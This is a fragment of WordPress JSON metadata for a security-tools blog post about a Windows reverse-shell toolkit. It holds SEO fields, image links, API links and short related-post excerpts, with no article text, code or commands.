environment","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/kalilinuxtutorials.com\/salsa-tools-shellreverse\/","og_locale":"en_US","og_type":"article","og_title":"Salsa Tools : ShellReverse TCP\/UDP\/ICMP\/DNS\/SSL\/BINDTCP","og_description":"Salsa Tools is a collection of three different tools that combined, allows you to get a reverse shell on steroids in any Windows environment","og_url":"https:\/\/kalilinuxtutorials.com\/salsa-tools-shellreverse\/","og_site_name":"Kali Linux Tutorials","article_published_time":"2019-06-15T12:15:24+00:00","og_image":[{"url":"https:\/\/1.bp.blogspot.com\/-pJmwN3-VnT4\/XQPfwQVGGnI\/AAAAAAAAA00\/JnXx99f2t-kEEYRcuxRy6CC2ahoL6xHfACLcBGAs\/s1600\/DLL-1%25281%2529.png","type":"","width":"","height":""}],"author":"R K","twitter_card":"summary_large_image","twitter_image":"https:\/\/1.bp.blogspot.com\/-pJmwN3-VnT4\/XQPfwQVGGnI\/AAAAAAAAA00\/JnXx99f2t-kEEYRcuxRy6CC2ahoL6xHfACLcBGAs\/s1600\/DLL-1%25281%2529.png","twitter_creator":"@CyberEdition","twitter_site":"@CyberEdition","twitter_misc":{"Written by":"R K","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/kalilinuxtutorials.com\/salsa-tools-shellreverse\/#article","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/salsa-tools-shellreverse\/"},"author":{"name":"R K","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad"},"headline":"Salsa Tools : ShellReverse TCP\/UDP\/ICMP\/DNS\/SSL\/BINDTCP &#038; AV Bypass, AMSI Patched","datePublished":"2019-06-15T12:15:24+00:00","mainEntityOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/salsa-tools-shellreverse\/"},"wordCount":1169,"publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/salsa-tools-shellreverse\/#primaryimage"},"thumbnailUrl":"https:\/\/1.bp.blogspot.com\/-pJmwN3-VnT4\/XQPfwQVGGnI\/AAAAAAAAA00\/JnXx99f2t-kEEYRcuxRy6CC2ahoL6xHfACLcBGAs\/s1600\/DLL-1%25281%2529.png","keywords":["AMSI","AV Bypass","BIND TCP","dns","ICMP","Salsa Tools","ShellReverse TCP","ssl","UDP"],"articleSection":["Kali Linux"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/kalilinuxtutorials.com\/salsa-tools-shellreverse\/","url":"https:\/\/kalilinuxtutorials.com\/salsa-tools-shellreverse\/","name":"Salsa Tools : ShellReverse TCP\/UDP\/ICMP\/DNS\/SSL\/BINDTCP","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/salsa-tools-shellreverse\/#primaryimage"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/salsa-tools-shellreverse\/#primaryimage"},"thumbnailUrl":"https:\/\/1.bp.blogspot.com\/-pJmwN3-VnT4\/XQPfwQVGGnI\/AAAAAAAAA00\/JnXx99f2t-kEEYRcuxRy6CC2ahoL6xHfACLcBGAs\/s1600\/DLL-1%25281%2529.png","datePublished":"2019-06-15T12:15:24+00:00","description":"Salsa Tools is a collection of three different tools that combined, allows you to get a reverse shell on steroids in any Windows environment","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/kalilinuxtutorials.com\/salsa-tools-shellreverse\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/salsa-tools-shellreverse\/#primaryimage","url":"https:\/\/1.bp.blogspot.com\/-pJmwN3-VnT4\/XQPfwQVGGnI\/AAAAAAAAA00\/JnXx99f2t-kEEYRcuxRy6CC2ahoL6xHfACLcBGAs\/s1600\/DLL-1%25281%2529.png","contentUrl":"https:\/\/1.bp.blogspot.com\/-pJmwN3-VnT4\/XQPfwQVGGnI\/AAAAAAAAA00\/JnXx99f2t-kEEYRcuxRy6CC2ahoL6xHfACLcBGAs\/s1600\/DLL-1%25281%2529.png"},{"@type":"WebSite","@id":"https:\/\/kalilinuxtutorials.com\/#website","url":"https:\/\/kalilinuxtutorials.com\/","name":"Kali Linux Tutorials","description":"Kali Linux Tutorials","publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/kalilinuxtutorials.com\/#organization","name":"Kali Linux Tutorials","url":"https:\/\/kalilinuxtutorials.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/","url":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","contentUrl":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","width":272,"height":90,"caption":"Kali Linux Tutorials"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/CyberEdition","https:\/\/www.threads.com\/@cybersecurityedition","https:\/\/www.linkedin.com\/company\/cyberedition","https:\/\/www.instagram.com\/cybersecurityedition\/"]},{"@type":"Person","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad","name":"R K","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","caption":"R K"},"url":"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/"}]}},"jetpack_featured_media_url":"https:\/\/1.bp.blogspot.com\/-pJmwN3-VnT4\/XQPfwQVGGnI\/AAAAAAAAA00\/JnXx99f2t-kEEYRcuxRy6CC2ahoL6xHfACLcBGAs\/s1600\/DLL-1%25281%2529.png","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":5411,"url":"https:\/\/kalilinuxtutorials.com\/kippo-honeypot-brute-force-attacks\/","url_meta":{"origin":5353,"position":0},"title":"Kippo &#8211; SSH Honeypot","author":"R K","date":"June 19, 2019","format":false,"excerpt":"Kippo is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker. Some interesting logs from a live Kippo installation below (viewable within a web browser with the help of Ajaxterm). Note that some commands may have been\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":31149,"url":"https:\/\/kalilinuxtutorials.com\/trafficwatch\/","url_meta":{"origin":5353,"position":1},"title":"TrafficWatch &#8211; A Comprehensive Guide To Network Traffic Analysis With Packet Sniffing","author":"Varshini","date":"November 3, 2023","format":false,"excerpt":"TrafficWatch, a packet sniffer tool, allows you to monitor and analyze network traffic from PCAP files. It provides insights into various network protocols and can help with network troubleshooting, security analysis, and more. Features Protocol-specific packet analysis for ARP, ICMP, TCP, UDP, DNS, DHCP, HTTP, SNMP, LLMNR, and NetBIOS. Packet\u2026","rel":"","context":"In &quot;Cyber security&quot;","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEj7V8t_QpogGHkYHB7iCMgeHC-OigVt18GoU994S_s0TrCmBLgCQmDiWBV2IIgVvMrdEvHtaSxkHIgqEZ8JLBE4RgelQuoE7jWwAKNuFGrPUOl2_iBitV3JBQrvYHnQ9y4SQb-x8-vFt7MSnqvk19JhPp05AhC_6dJ0mFMjPHfmkle8VBLbF90uwB_-Cg\/s16000\/TrafficWatch%20.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEj7V8t_QpogGHkYHB7iCMgeHC-OigVt18GoU994S_s0TrCmBLgCQmDiWBV2IIgVvMrdEvHtaSxkHIgqEZ8JLBE4RgelQuoE7jWwAKNuFGrPUOl2_iBitV3JBQrvYHnQ9y4SQb-x8-vFt7MSnqvk19JhPp05AhC_6dJ0mFMjPHfmkle8VBLbF90uwB_-Cg\/s16000\/TrafficWatch%20.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEj7V8t_QpogGHkYHB7iCMgeHC-OigVt18GoU994S_s0TrCmBLgCQmDiWBV2IIgVvMrdEvHtaSxkHIgqEZ8JLBE4RgelQuoE7jWwAKNuFGrPUOl2_iBitV3JBQrvYHnQ9y4SQb-x8-vFt7MSnqvk19JhPp05AhC_6dJ0mFMjPHfmkle8VBLbF90uwB_-Cg\/s16000\/TrafficWatch%20.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEj7V8t_QpogGHkYHB7iCMgeHC-OigVt18GoU994S_s0TrCmBLgCQmDiWBV2IIgVvMrdEvHtaSxkHIgqEZ8JLBE4RgelQuoE7jWwAKNuFGrPUOl2_iBitV3JBQrvYHnQ9y4SQb-x8-vFt7MSnqvk19JhPp05AhC_6dJ0mFMjPHfmkle8VBLbF90uwB_-Cg\/s16000\/TrafficWatch%20.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEj7V8t_QpogGHkYHB7iCMgeHC-OigVt18GoU994S_s0TrCmBLgCQmDiWBV2IIgVvMrdEvHtaSxkHIgqEZ8JLBE4RgelQuoE7jWwAKNuFGrPUOl2_iBitV3JBQrvYHnQ9y4SQb-x8-vFt7MSnqvk19JhPp05AhC_6dJ0mFMjPHfmkle8VBLbF90uwB_-Cg\/s16000\/TrafficWatch%20.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEj7V8t_QpogGHkYHB7iCMgeHC-OigVt18GoU994S_s0TrCmBLgCQmDiWBV2IIgVvMrdEvHtaSxkHIgqEZ8JLBE4RgelQuoE7jWwAKNuFGrPUOl2_iBitV3JBQrvYHnQ9y4SQb-x8-vFt7MSnqvk19JhPp05AhC_6dJ0mFMjPHfmkle8VBLbF90uwB_-Cg\/s16000\/TrafficWatch%20.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":9980,"url":"https:\/\/kalilinuxtutorials.com\/finalrecon-2\/","url_meta":{"origin":5353,"position":2},"title":"FinalRecon : OSINT Tool for All-In-One Web Reconnaissance","author":"R K","date":"March 28, 2020","format":false,"excerpt":"FinalRecon is a fast and simple python script for web reconnaissance. It follows a modular structure so in future new modules can be added with ease. Features It provides detailed information such as : Header Information Whois SSL Certificate Information Crawler DNS Enumeration A, AAAA, ANY, CNAME, MX, NS, SOA,\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/img.youtube.com\/vi\/10q_CKnM3x4\/0.jpg?resize=350%2C200","width":350,"height":200},"classes":[]},{"id":26123,"url":"https:\/\/kalilinuxtutorials.com\/pulsar-2\/","url_meta":{"origin":5353,"position":3},"title":"Pulsar : Data Exfiltration And Covert Communication Tool","author":"R K","date":"July 25, 2022","format":false,"excerpt":"Pulsar is a tool for data exfiltration and covert communication that enable you to create a secure data transfer, a bizarre chat or a network tunnel through different protocols, for example you can receive data from tcp connection and resend it to real destination through DNS packets\u00a0 Setting up Pulsar\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhaLbljyIlkfDxiAXq6AKvBhNO0DwIMr7IClCQz7okOo07KC4ccOMf3S9JnGykXzYor9H3uF_L9t10I6Cs4uyd8mMMAGJLlUCYDQjk9ZserBJk2J7KV41JVY0xu-sPBdpixvdE4L1tw8Rts1tDToxSR_TOdlcS6Y4vvqi-tCSChQPdB-RC6do_odf4t\/s728\/Data%20Exfiltration%20%282%29.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhaLbljyIlkfDxiAXq6AKvBhNO0DwIMr7IClCQz7okOo07KC4ccOMf3S9JnGykXzYor9H3uF_L9t10I6Cs4uyd8mMMAGJLlUCYDQjk9ZserBJk2J7KV41JVY0xu-sPBdpixvdE4L1tw8Rts1tDToxSR_TOdlcS6Y4vvqi-tCSChQPdB-RC6do_odf4t\/s728\/Data%20Exfiltration%20%282%29.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhaLbljyIlkfDxiAXq6AKvBhNO0DwIMr7IClCQz7okOo07KC4ccOMf3S9JnGykXzYor9H3uF_L9t10I6Cs4uyd8mMMAGJLlUCYDQjk9ZserBJk2J7KV41JVY0xu-sPBdpixvdE4L1tw8Rts1tDToxSR_TOdlcS6Y4vvqi-tCSChQPdB-RC6do_odf4t\/s728\/Data%20Exfiltration%20%282%29.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhaLbljyIlkfDxiAXq6AKvBhNO0DwIMr7IClCQz7okOo07KC4ccOMf3S9JnGykXzYor9H3uF_L9t10I6Cs4uyd8mMMAGJLlUCYDQjk9ZserBJk2J7KV41JVY0xu-sPBdpixvdE4L1tw8Rts1tDToxSR_TOdlcS6Y4vvqi-tCSChQPdB-RC6do_odf4t\/s728\/Data%20Exfiltration%20%282%29.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":18930,"url":"https:\/\/kalilinuxtutorials.com\/streamdivert\/","url_meta":{"origin":5353,"position":4},"title":"StreamDivert : Redirecting (Specific) TCP, UDP And ICMP Traffic To Another Destination","author":"R K","date":"October 6, 2021","format":false,"excerpt":"StreamDivert is a tool to man-in-the-middle or relay in and outgoing network connections on a system. It has the ability to, for example, relay all incoming SMB connections to port 445 to another server, or only relay specific incoming SMB connections from a specific set of source IP's to another\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/1.bp.blogspot.com\/-Zz3wjv0M-RU\/YVSABedat8I\/AAAAAAAAK-g\/Qc-I4NTlf0QhOuNYhJeFIMN0htLOkp3ogCLcBGAsYHQ\/s876\/streamdivert-5%2B%25281%2529.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/1.bp.blogspot.com\/-Zz3wjv0M-RU\/YVSABedat8I\/AAAAAAAAK-g\/Qc-I4NTlf0QhOuNYhJeFIMN0htLOkp3ogCLcBGAsYHQ\/s876\/streamdivert-5%2B%25281%2529.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/1.bp.blogspot.com\/-Zz3wjv0M-RU\/YVSABedat8I\/AAAAAAAAK-g\/Qc-I4NTlf0QhOuNYhJeFIMN0htLOkp3ogCLcBGAsYHQ\/s876\/streamdivert-5%2B%25281%2529.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/1.bp.blogspot.com\/-Zz3wjv0M-RU\/YVSABedat8I\/AAAAAAAAK-g\/Qc-I4NTlf0QhOuNYhJeFIMN0htLOkp3ogCLcBGAsYHQ\/s876\/streamdivert-5%2B%25281%2529.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":27532,"url":"https:\/\/kalilinuxtutorials.com\/mhddos\/","url_meta":{"origin":5353,"position":5},"title":"MHDDoS : DDoS Attack Script With 56 Methods","author":"R K","date":"October 27, 2022","format":false,"excerpt":"MHDDoS is a DDoS Attack Script With 56 Methods. But Don't Attack websites without the owners consent. Features And Methods \ud83d\udca3 Layer7 GET | GET Flood POST | POST Flood OVH | Bypass OVH RHEX | Random HEX STOMP | Bypass chk_captcha STRESS | Send HTTP Packet With High Byte\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhKr3SOiS5WbQdNl57QOIyIWxFIiwqD-DUD2KieIIaR91DToK6aSX7DsMMbbEOGhfIPK8nxXimIECG8AUMqQ_C2LF3lyp7g0CocFxLD0vg-yD_Y1Dx3MMKmBQTSiihY0E4FL8xDAfMrAdOk1cNl1GSrBZDSJqA1Q6G5IWX4bD4pz-C0cKJkwKHDbwUi\/s728\/MHDDoS.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhKr3SOiS5WbQdNl57QOIyIWxFIiwqD-DUD2KieIIaR91DToK6aSX7DsMMbbEOGhfIPK8nxXimIECG8AUMqQ_C2LF3lyp7g0CocFxLD0vg-yD_Y1Dx3MMKmBQTSiihY0E4FL8xDAfMrAdOk1cNl1GSrBZDSJqA1Q6G5IWX4bD4pz-C0cKJkwKHDbwUi\/s728\/MHDDoS.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhKr3SOiS5WbQdNl57QOIyIWxFIiwqD-DUD2KieIIaR91DToK6aSX7DsMMbbEOGhfIPK8nxXimIECG8AUMqQ_C2LF3lyp7g0CocFxLD0vg-yD_Y1Dx3MMKmBQTSiihY0E4FL8xDAfMrAdOk1cNl1GSrBZDSJqA1Q6G5IWX4bD4pz-C0cKJkwKHDbwUi\/s728\/MHDDoS.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhKr3SOiS5WbQdNl57QOIyIWxFIiwqD-DUD2KieIIaR91DToK6aSX7DsMMbbEOGhfIPK8nxXimIECG8AUMqQ_C2LF3lyp7g0CocFxLD0vg-yD_Y1Dx3MMKmBQTSiihY0E4FL8xDAfMrAdOk1cNl1GSrBZDSJqA1Q6G5IWX4bD4pz-C0cKJkwKHDbwUi\/s728\/MHDDoS.png?resize=700%2C400&ssl=1 2x"},"classes":[]}],"_links":{"self":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/5353","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/comments?post=5353"}],"version-history":[{"count":0,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/5353\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media\/15608"}],"wp:attachment":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media?parent=5353"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/categories?post=5353"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/tags?post=5353"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}